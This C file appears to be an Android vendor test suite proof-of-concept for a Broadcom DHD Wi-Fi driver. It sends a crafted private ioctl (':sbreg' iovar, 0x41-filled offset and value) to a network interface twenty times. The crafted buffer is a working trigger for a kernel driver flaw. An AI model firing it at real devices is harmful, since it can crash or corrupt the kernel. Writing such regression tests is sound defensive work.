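/*
 * Copyright (C) 2016 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/*
 * Regression-test harness: issues one device-private ioctl on a network
 * interface and reports POC_TEST_PASS / POC_TEST_FAIL to the caller.
 * The interface name is supplied by the test host through the "ifname"
 * parameter.
 */

#include "poc_test.h"

#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <sys/socket.h>
#include <linux/fb.h>
#include <linux/wireless.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define BUF_LEN 8192
#define IOC_BUF_LEN 63
#define TEST_CNT 20

typedef struct _android_wifi_priv_cmd {
  char *buf;
  int used_len;
  int total_len;
} android_wifi_priv_cmd;

typedef struct sdreg {
  int func;
  int offset;
  int value;
} sdreg_t;

typedef struct dhd_ioctl {
  uint cmd;          /* common ioctl definition */
  void *buf;         /* pointer to user buffer */
  uint len;          /* length of user buffer */
  unsigned char set; /* get or set request (optional) */
  uint used;         /* bytes read or written (optional) */
  uint needed;       /* bytes needed (optional) */
  uint driver;       /* to identify target driver */
} dhd_ioctl_t;

/*
 * Sends a single private ioctl (request 0x89F0) to the interface `ifname`.
 *
 * The request carries a dhd_ioctl_t with cmd = 0x2 and
 * driver = 0x00444944 whose user buffer is IOC_BUF_LEN bytes long:
 * the 7-byte string ":sbreg\0", then a struct sdreg with func = 1, with
 * every remaining byte set to 0x41.
 *
 * Returns POC_TEST_FAIL if `ifname` is NULL or does not fit in the ifreq
 * name field, or if the socket cannot be created; POC_TEST_PASS otherwise.
 *
 * NOTE(review): an ioctl error is only logged and the function still
 * returns POC_TEST_PASS. A wrong or absent interface name therefore also
 * yields PASS even though the request presumably never reached a driver;
 * consider reporting that case separately so a vacuous pass can be told
 * apart from a real one.
 */
int poc(const char *ifname) {
  static const char var_name[] = ":sbreg"; /* 7 bytes including the NUL */
  int fd, res;
  size_t name_len;
  dhd_ioctl_t ioc;
  struct ifreq arg;
  sdreg_t reg;
  char iocbuf[IOC_BUF_LEN];

  /*
   * Reject names that would overrun the fixed-size ifreq name field. The
   * strict bound also leaves room for the terminating NUL.
   */
  if (ifname == NULL) {
    fprintf(stderr, "ifname parameter is missing.\n");
    return POC_TEST_FAIL;
  }
  name_len = strlen(ifname);
  if (name_len >= sizeof(arg.ifr_ifrn.ifrn_name)) {
    fprintf(stderr, "ifname parameter is too long.\n");
    return POC_TEST_FAIL;
  }

  fd = socket(AF_INET, SOCK_STREAM, 0);
  if (fd < 0) {
    printf("open socket error : fd:0x%x %s \n", fd, strerror(errno));
    return POC_TEST_FAIL;
  }

  /*
   * Zero both request structures first: the interface name must be
   * NUL-terminated, and the fields this test does not set (set, used,
   * needed) should not carry indeterminate stack contents into the kernel.
   */
  memset(&arg, 0, sizeof(arg));
  memset(&ioc, 0, sizeof(ioc));
  memcpy(arg.ifr_ifrn.ifrn_name, ifname, name_len);

  memset(iocbuf, 0x41, IOC_BUF_LEN);
  memcpy(iocbuf, var_name, sizeof(var_name));

  /*
   * The sdreg record sits at byte offset 7, which is not aligned for an
   * int, so it is read and written through memcpy instead of a pointer
   * cast. Only func changes; offset and value keep the 0x41 fill.
   */
  memcpy(&reg, iocbuf + sizeof(var_name), sizeof(reg));
  reg.func = 1;
  memcpy(iocbuf + sizeof(var_name), &reg, sizeof(reg));

  ioc.len = IOC_BUF_LEN;
  ioc.buf = iocbuf;
  ioc.driver = 0x00444944;
  ioc.cmd = 0x2;

  arg.ifr_data = &ioc;

  /* 0x89F0 is the value of SIOCDEVPRIVATE in <linux/sockios.h>. */
  if ((res = ioctl(fd, 0x89F0, (struct ifreq *)&arg)) < 0) {
    printf("ioctl error res:0x%x, %s \r\n", res, strerror(errno));
  }
  sleep(1);

  close(fd);
  return POC_TEST_PASS;
}

/*
 * Entry point: reads the "ifname" host parameter and runs poc() up to
 * TEST_CNT times, stopping at the first result other than POC_TEST_PASS.
 * Returns the last poc() result, or POC_TEST_FAIL when the parameter is
 * empty.
 */
int main(int argc, char **argv) {
  VtsHostInput host_input = ParseVtsHostFlags(argc, argv);
  const char *ifname = host_input.params["ifname"].c_str();
  if (strlen(ifname) == 0) {
    fprintf(stderr, "ifname parameter is empty.\n");
    return POC_TEST_FAIL;
  }

  /* Initialised so the return value is defined even if the loop is empty. */
  int ret = POC_TEST_PASS;

  for (int i = 0; i < TEST_CNT; i++) {
    if ((ret = poc(ifname)) != POC_TEST_PASS) break;
  }

  return ret;
}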